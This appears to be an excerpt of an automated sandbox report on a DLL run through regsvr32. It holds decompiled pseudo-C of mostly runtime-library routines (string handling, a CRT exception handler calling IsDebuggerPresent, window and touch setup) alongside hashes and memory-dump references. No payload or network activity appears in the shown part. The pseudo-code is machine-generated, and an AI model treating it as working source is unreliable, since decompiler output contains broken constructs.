                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction ID: 1a08639a0cb995df1e9339a60fe9c13f949776c29eedd062968a656382250cdd
                                                                                                        • Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction Fuzzy Hash: B1F05E01F1D22F48FE5477A15E4127911C1CF44BE2F080232D82E892C1DD6DA451C6B8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00007FFC7FFC28901B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t8;
                                                                                                        
                                                                                                        				_t8 = __rax;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC289011A0(_a16);
                                                                                                        				_t7 = E00007FFC7FFC28901B40(_t8, _a8, _a16, _t8); // executed
                                                                                                        				return _t7;
                                                                                                        			}





                                                                                                        0x7ffc28901b10
                                                                                                        0x7ffc28901b10
                                                                                                        0x7ffc28901b15
                                                                                                        0x7ffc28901b23
                                                                                                        0x7ffc28901b35
                                                                                                        0x7ffc28901b3e

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901B23
                                                                                                          • Part of subcall function 00007FFC28901B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901B6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 1444011685-0
                                                                                                        • Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction ID: 46453a1bb2825b3416e37a0c64f9ad1b7d1350fb6403ff7a0c36074502ffec2e
                                                                                                        • Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                        • Instruction Fuzzy Hash: B1D09E66A29A8581D584FB12FC9115AA764EBC87C1F805435FA8E42B6ADF28C1518F04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC28909474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* _t36;
                                                                                                        				int _t40;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr _t53;
                                                                                                        				signed long long _t63;
                                                                                                        				long long _t66;
                                                                                                        				_Unknown_base(*)()* _t86;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				void* _t93;
                                                                                                        				signed long long _t94;
                                                                                                        				struct _EXCEPTION_POINTERS* _t100;
                                                                                                        
                                                                                                        				_t46 = __ecx;
                                                                                                        				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                                                                        				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                                                                        				_t91 = _t93 - 0x4f0;
                                                                                                        				_t94 = _t93 - 0x5f0;
                                                                                                        				_t63 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                                                                        				_t53 = r8d;
                                                                                                        				_t45 = __ecx;
                                                                                                        				if (__ecx == 0xffffffff) goto 0x289094b3;
                                                                                                        				E00007FFC7FFC2890493C(_t36);
                                                                                                        				r8d = 0x98;
                                                                                                        				E00007FFC7FFC28906920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                                                                                                        				r8d = 0x4d0;
                                                                                                        				E00007FFC7FFC28906920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                                                                                                        				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                                                                                                        				_t66 = _t91 + 0x10;
                                                                                                        				 *((long long*)(_t94 + 0x50)) = _t66;
                                                                                                        				__imp__RtlCaptureContext();
                                                                                                        				r8d = 0;
                                                                                                        				__imp__RtlLookupFunctionEntry();
                                                                                                        				if (_t66 == 0) goto 0x28909546;
                                                                                                        				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                                                                        				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
                                                                                                        				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
                                                                                                        				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                                                                                                        				__imp__RtlVirtualUnwind();
                                                                                                        				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                                                                        				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                                                                                                        				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                        				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                                                                        				_t40 = IsDebuggerPresent();
                                                                                                        				SetUnhandledExceptionFilter(_t86, _t90);
                                                                                                        				if (UnhandledExceptionFilter(_t100) != 0) goto 0x289095a8;
                                                                                                        				if (_t40 != 0) goto 0x289095a8;
                                                                                                        				if (_t45 == 0xffffffff) goto 0x289095a8;
                                                                                                        				return E00007FFC7FFC28903A70(E00007FFC7FFC2890493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
                                                                                                        			}
















                                                                                                        0x7ffc28909474
                                                                                                        0x7ffc28909474
                                                                                                        0x7ffc28909479
                                                                                                        0x7ffc28909482
                                                                                                        0x7ffc2890948a
                                                                                                        0x7ffc28909491
                                                                                                        0x7ffc2890949b
                                                                                                        0x7ffc289094a2
                                                                                                        0x7ffc289094a7
                                                                                                        0x7ffc289094ac
                                                                                                        0x7ffc289094ae
                                                                                                        0x7ffc289094ba
                                                                                                        0x7ffc289094c0
                                                                                                        0x7ffc289094cb
                                                                                                        0x7ffc289094d1
                                                                                                        0x7ffc289094db
                                                                                                        0x7ffc289094e4
                                                                                                        0x7ffc289094e8
                                                                                                        0x7ffc289094ed
                                                                                                        0x7ffc28909502
                                                                                                        0x7ffc28909505
                                                                                                        0x7ffc2890950e
                                                                                                        0x7ffc28909510
                                                                                                        0x7ffc28909523
                                                                                                        0x7ffc28909530
                                                                                                        0x7ffc28909539
                                                                                                        0x7ffc28909540
                                                                                                        0x7ffc2890954d
                                                                                                        0x7ffc2890955f
                                                                                                        0x7ffc28909563
                                                                                                        0x7ffc28909571
                                                                                                        0x7ffc28909575
                                                                                                        0x7ffc28909579
                                                                                                        0x7ffc28909583
                                                                                                        0x7ffc28909596
                                                                                                        0x7ffc2890959a
                                                                                                        0x7ffc2890959f
                                                                                                        0x7ffc289095ce

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1239891234-0
                                                                                                        • Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction ID: f3ae1363acb6a4a341274bb7e115917a94debef2afe5d9b10de4a7b82cc1d4ee
                                                                                                        • Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                        • Instruction Fuzzy Hash: 86318C32608B958AEB609F25EC402EE33A0FB8875AF440136EA9E43B94DF38C145CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC28903240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				long long _v112;
                                                                                                        				long long _v120;
                                                                                                        				long long _v128;
                                                                                                        				long long _v136;
                                                                                                        				long long _t207;
                                                                                                        				intOrPtr* _t209;
                                                                                                        				intOrPtr _t218;
                                                                                                        				intOrPtr _t221;
                                                                                                        				long long _t223;
                                                                                                        				void* _t225;
                                                                                                        				intOrPtr _t228;
                                                                                                        				long long _t229;
                                                                                                        				void* _t230;
                                                                                                        				intOrPtr _t235;
                                                                                                        				long long _t237;
                                                                                                        				void* _t239;
                                                                                                        				void* _t243;
                                                                                                        				long long _t245;
                                                                                                        				void* _t247;
                                                                                                        				long long _t248;
                                                                                                        				void* _t249;
                                                                                                        				long long _t250;
                                                                                                        				void* _t251;
                                                                                                        				long long _t257;
                                                                                                        
                                                                                                        				_t207 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC289021F0(__eflags, __rax, _a8, _a16);
                                                                                                        				E00007FFC7FFC289021F0(__eflags, __rax, _a32, _a40);
                                                                                                        				E00007FFC7FFC28902400(__eflags, __rax, _a8, _a16, _a24);
                                                                                                        				_a24 = _t207;
                                                                                                        				E00007FFC7FFC28902400(__eflags, _t207, _a32, _a40, _a48);
                                                                                                        				_a48 = _t207;
                                                                                                        				_t209 = 0xffffffff - _a48;
                                                                                                        				_v120 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170(_t209, _a8);
                                                                                                        				_t211 =  *_t209 - _a24;
                                                                                                        				if (_v120 - 0xffffffff > 0) goto 0x28903315;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170( *_t209 - _a24, _a8);
                                                                                                        				_v136 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170( *_t211 - _a24 - _a16, _a8);
                                                                                                        				_v128 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
                                                                                                        				if ( *0xffffffff - _v128 >= 0) goto 0x2890338e;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC289022B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
                                                                                                        				_t218 = _a24;
                                                                                                        				if (_a48 != _t218) goto 0x289033ec;
                                                                                                        				E00007FFC7FFC289018D0(_t218, _a32);
                                                                                                        				_v112 = _t218 + _a40;
                                                                                                        				E00007FFC7FFC289018F0(_t218 + _a40, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t218 + _a40 + _a16, _v112, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t221 = _a32;
                                                                                                        				if (_a8 == _t221) goto 0x289034a2;
                                                                                                        				E00007FFC7FFC289018F0(_t221, _a8);
                                                                                                        				_t223 = _t221 + _a16 + _a24;
                                                                                                        				_v104 = _t223;
                                                                                                        				E00007FFC7FFC289018F0(_t223, _a8);
                                                                                                        				_t225 = _t223 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC28901230(_t225, _v104, _v136);
                                                                                                        				E00007FFC7FFC289018D0(_t225, _a32);
                                                                                                        				_v96 = _t225 + _a40;
                                                                                                        				E00007FFC7FFC289018F0(_t225 + _a40, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_t225 + _a40 + _a16, _v96, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t228 = _a24;
                                                                                                        				if (_a48 - _t228 >= 0) goto 0x28903558;
                                                                                                        				E00007FFC7FFC289018F0(_t228, _a8);
                                                                                                        				_t229 = _t228 + _a40;
                                                                                                        				_v88 = _t229;
                                                                                                        				E00007FFC7FFC289018F0(_t229, _a8);
                                                                                                        				_t230 = _t229 + _a16;
                                                                                                        				E00007FFC7FFC28901230(_t230, _v88, _a48);
                                                                                                        				E00007FFC7FFC289018F0(_t230, _a8);
                                                                                                        				_v80 = _t230 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC289018F0(_t230 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t235 = _a16;
                                                                                                        				if (_a40 - _t235 > 0) goto 0x2890360e;
                                                                                                        				E00007FFC7FFC289018F0(_t235, _a8);
                                                                                                        				_t237 = _t235 + _a16 + _a24;
                                                                                                        				_v72 = _t237;
                                                                                                        				E00007FFC7FFC289018F0(_t237, _a8);
                                                                                                        				_t239 = _t237 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC28901230(_t239, _v72, _v136);
                                                                                                        				E00007FFC7FFC289018F0(_t239, _a8);
                                                                                                        				_v64 = _t239 + _a40;
                                                                                                        				E00007FFC7FFC289018F0(_t239 + _a40, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t239 + _a40 + _a16, _v64, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t243 = _a16 + _a24;
                                                                                                        				if (_t243 - _a40 > 0) goto 0x289036eb;
                                                                                                        				E00007FFC7FFC289018F0(_t243, _a8);
                                                                                                        				_t245 = _t243 + _a16 + _a24;
                                                                                                        				_v56 = _t245;
                                                                                                        				E00007FFC7FFC289018F0(_t245, _a8);
                                                                                                        				_t247 = _t245 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC28901230(_t247, _v56, _v136);
                                                                                                        				E00007FFC7FFC289018F0(_t247, _a8);
                                                                                                        				_t248 = _t247 + _a40 + _a48 - _a24;
                                                                                                        				_v48 = _t248;
                                                                                                        				E00007FFC7FFC289018F0(_t248, _a8);
                                                                                                        				_t249 = _t248 + _a16;
                                                                                                        				E00007FFC7FFC28901230(_t249, _v48, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				E00007FFC7FFC289018F0(_t249, _a8);
                                                                                                        				_t250 = _t249 + _a40;
                                                                                                        				_v40 = _t250;
                                                                                                        				E00007FFC7FFC289018F0(_t250, _a8);
                                                                                                        				_t251 = _t250 + _a16;
                                                                                                        				E00007FFC7FFC28901230(_t251, _v40, _a24);
                                                                                                        				E00007FFC7FFC289018F0(_t251, _a8);
                                                                                                        				_v32 = _t251 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC289018F0(_t251 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
                                                                                                        				_t257 = _a48 - _a24;
                                                                                                        				_v24 = _t257;
                                                                                                        				E00007FFC7FFC289018F0(_t257, _a8);
                                                                                                        				_t259 = _t257 + _a40 + _a48;
                                                                                                        				_v16 = _t257 + _a40 + _a48;
                                                                                                        				E00007FFC7FFC289018F0(_t257 + _a40 + _a48, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t259 + _a16 + _a24, _v16, _v24);
                                                                                                        				return E00007FFC7FFC289023A0(_t259 + _a16 + _a24, _a8, _v128);
                                                                                                        			}







































                                                                                                        0x7ffc28903240
                                                                                                        0x7ffc28903240
                                                                                                        0x7ffc28903245
                                                                                                        0x7ffc2890324a
                                                                                                        0x7ffc2890324f
                                                                                                        0x7ffc2890326b
                                                                                                        0x7ffc28903280
                                                                                                        0x7ffc2890329d
                                                                                                        0x7ffc289032a2
                                                                                                        0x7ffc289032c2
                                                                                                        0x7ffc289032c7
                                                                                                        0x7ffc289032d6
                                                                                                        0x7ffc289032de
                                                                                                        0x7ffc289032eb
                                                                                                        0x7ffc289032fb
                                                                                                        0x7ffc28903306
                                                                                                        0x7ffc28903310
                                                                                                        0x7ffc2890331d
                                                                                                        0x7ffc28903338
                                                                                                        0x7ffc28903345
                                                                                                        0x7ffc2890335d
                                                                                                        0x7ffc2890336a
                                                                                                        0x7ffc28903377
                                                                                                        0x7ffc28903379
                                                                                                        0x7ffc28903389
                                                                                                        0x7ffc2890338e
                                                                                                        0x7ffc2890339e
                                                                                                        0x7ffc289033a8
                                                                                                        0x7ffc289033b5
                                                                                                        0x7ffc289033c2
                                                                                                        0x7ffc289033e2
                                                                                                        0x7ffc289033e7
                                                                                                        0x7ffc289033ec
                                                                                                        0x7ffc289033fc
                                                                                                        0x7ffc2890340a
                                                                                                        0x7ffc28903417
                                                                                                        0x7ffc2890341f
                                                                                                        0x7ffc2890342c
                                                                                                        0x7ffc28903439
                                                                                                        0x7ffc28903451
                                                                                                        0x7ffc2890345e
                                                                                                        0x7ffc2890346b
                                                                                                        0x7ffc28903478
                                                                                                        0x7ffc28903498
                                                                                                        0x7ffc2890349d
                                                                                                        0x7ffc289034a2
                                                                                                        0x7ffc289034b2
                                                                                                        0x7ffc289034c0
                                                                                                        0x7ffc289034c5
                                                                                                        0x7ffc289034cd
                                                                                                        0x7ffc289034da
                                                                                                        0x7ffc289034df
                                                                                                        0x7ffc289034fa
                                                                                                        0x7ffc28903507
                                                                                                        0x7ffc2890351c
                                                                                                        0x7ffc28903529
                                                                                                        0x7ffc2890354e
                                                                                                        0x7ffc28903553
                                                                                                        0x7ffc28903558
                                                                                                        0x7ffc28903568
                                                                                                        0x7ffc28903576
                                                                                                        0x7ffc28903583
                                                                                                        0x7ffc2890358b
                                                                                                        0x7ffc28903598
                                                                                                        0x7ffc289035a5
                                                                                                        0x7ffc289035bd
                                                                                                        0x7ffc289035ca
                                                                                                        0x7ffc289035d7
                                                                                                        0x7ffc289035e4
                                                                                                        0x7ffc28903604
                                                                                                        0x7ffc28903609
                                                                                                        0x7ffc28903621
                                                                                                        0x7ffc2890362c
                                                                                                        0x7ffc2890363a
                                                                                                        0x7ffc28903647
                                                                                                        0x7ffc2890364f
                                                                                                        0x7ffc2890365c
                                                                                                        0x7ffc28903669
                                                                                                        0x7ffc28903681
                                                                                                        0x7ffc2890368e
                                                                                                        0x7ffc289036b1
                                                                                                        0x7ffc289036b4
                                                                                                        0x7ffc289036c1
                                                                                                        0x7ffc289036c6
                                                                                                        0x7ffc289036e1
                                                                                                        0x7ffc289036e6
                                                                                                        0x7ffc289036f3
                                                                                                        0x7ffc289036f8
                                                                                                        0x7ffc28903700
                                                                                                        0x7ffc28903710
                                                                                                        0x7ffc28903715
                                                                                                        0x7ffc28903733
                                                                                                        0x7ffc28903740
                                                                                                        0x7ffc28903755
                                                                                                        0x7ffc28903765
                                                                                                        0x7ffc2890378d
                                                                                                        0x7ffc289037a5
                                                                                                        0x7ffc289037a8
                                                                                                        0x7ffc289037b8
                                                                                                        0x7ffc289037c5
                                                                                                        0x7ffc289037cd
                                                                                                        0x7ffc289037dd
                                                                                                        0x7ffc2890380b
                                                                                                        0x7ffc28903831

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1550686663-0
                                                                                                        • Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction ID: a4050e9b8abc6c8067f030f1639df138debc0b1597bb05ccc9b5535166bd2b08
                                                                                                        • Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction Fuzzy Hash: 84D1C566A1DBC581DA70EB55F8913AAB361FBC8795F004127EA8D43BAADF2DD040CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateMessageRegisterTouch
                                                                                                        • String ID: Cannot register application window for multi-touch input$Error
                                                                                                        • API String ID: 490141109-480840240
                                                                                                        • Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction ID: 2b977444f7f364db7f1cc1a4d857aa665fce99b2de5590091c96e5b5fe4099ea
                                                                                                        • Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction Fuzzy Hash: DD51197590CB5A86EB50AB15FC4436A73A0FB84B96F400536DA8E43BE4DF3CE044DB24
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 48%
                                                                                                        			E00007FFC7FFC28902FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _t100;
                                                                                                        				intOrPtr* _t102;
                                                                                                        				intOrPtr* _t104;
                                                                                                        				long long _t108;
                                                                                                        				long long _t110;
                                                                                                        				intOrPtr* _t112;
                                                                                                        				intOrPtr _t116;
                                                                                                        				long long _t118;
                                                                                                        
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x2890303c;
                                                                                                        				E00007FFC7FFC289018F0(__rax, _a8);
                                                                                                        				_t100 = _a32 - __rax;
                                                                                                        				_v64 = _a40;
                                                                                                        				_v72 = _t100;
                                                                                                        				E00007FFC7FFC28903240(__edx, E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
                                                                                                        				goto 0x28903214;
                                                                                                        				E00007FFC7FFC289021F0(E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
                                                                                                        				E00007FFC7FFC28902400(E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
                                                                                                        				_a24 = _t100;
                                                                                                        				_t102 = 0xffffffff - _a40;
                                                                                                        				_v40 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170(_t102, _a8);
                                                                                                        				_t104 =  *_t102 - _a24;
                                                                                                        				if (_v40 - 0xffffffff > 0) goto 0x289030aa;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170(_t104, _a8);
                                                                                                        				_v56 =  *_t104 - _a24 - _a16;
                                                                                                        				_t108 = _a24;
                                                                                                        				if (_a40 - _t108 >= 0) goto 0x28903126;
                                                                                                        				E00007FFC7FFC289018F0(_t108, _a8);
                                                                                                        				_t110 = _t108 + _a16 + _a24;
                                                                                                        				_v32 = _t110;
                                                                                                        				E00007FFC7FFC289018F0(_t110, _a8);
                                                                                                        				_t112 = _t110 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC28901230(_t112, _v32, _v56);
                                                                                                        				E00007FFC7FFC28902170(_t112, _a8);
                                                                                                        				_v48 =  *_t112 + _a40 - _a24;
                                                                                                        				if (_a40 > 0) goto 0x28903162;
                                                                                                        				if (_a24 <= 0) goto 0x2890320f;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC289022B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x2890320f;
                                                                                                        				_t116 = _a40;
                                                                                                        				if (_a24 - _t116 >= 0) goto 0x289031d9;
                                                                                                        				E00007FFC7FFC289018F0(_t116, _a8);
                                                                                                        				_t118 = _t116 + _a16 + _a24;
                                                                                                        				_v24 = _t118;
                                                                                                        				E00007FFC7FFC289018F0(_t118, _a8);
                                                                                                        				_t120 = _t118 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC28901230(_t118 + _a16 + _a40, _v24, _v56);
                                                                                                        				E00007FFC7FFC289018F0(_t118 + _a16 + _a40, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_t120 + _a16, _a32, _a40);
                                                                                                        				return E00007FFC7FFC289023A0(_t120 + _a16, _a8, _v48);
                                                                                                        			}


















                                                                                                        0x7ffc28902fc0
                                                                                                        0x7ffc28902fc5
                                                                                                        0x7ffc28902fca
                                                                                                        0x7ffc28902fcf
                                                                                                        0x7ffc28902fef
                                                                                                        0x7ffc28902ff6
                                                                                                        0x7ffc28903006
                                                                                                        0x7ffc28903011
                                                                                                        0x7ffc28903016
                                                                                                        0x7ffc28903032
                                                                                                        0x7ffc28903037
                                                                                                        0x7ffc28903046
                                                                                                        0x7ffc2890305d
                                                                                                        0x7ffc28903062
                                                                                                        0x7ffc28903071
                                                                                                        0x7ffc28903079
                                                                                                        0x7ffc28903083
                                                                                                        0x7ffc28903093
                                                                                                        0x7ffc2890309e
                                                                                                        0x7ffc289030a5
                                                                                                        0x7ffc289030af
                                                                                                        0x7ffc289030c7
                                                                                                        0x7ffc289030cc
                                                                                                        0x7ffc289030dc
                                                                                                        0x7ffc289030e3
                                                                                                        0x7ffc289030ed
                                                                                                        0x7ffc289030f5
                                                                                                        0x7ffc289030ff
                                                                                                        0x7ffc28903109
                                                                                                        0x7ffc28903121
                                                                                                        0x7ffc2890312b
                                                                                                        0x7ffc28903143
                                                                                                        0x7ffc28903151
                                                                                                        0x7ffc2890315c
                                                                                                        0x7ffc28903162
                                                                                                        0x7ffc28903179
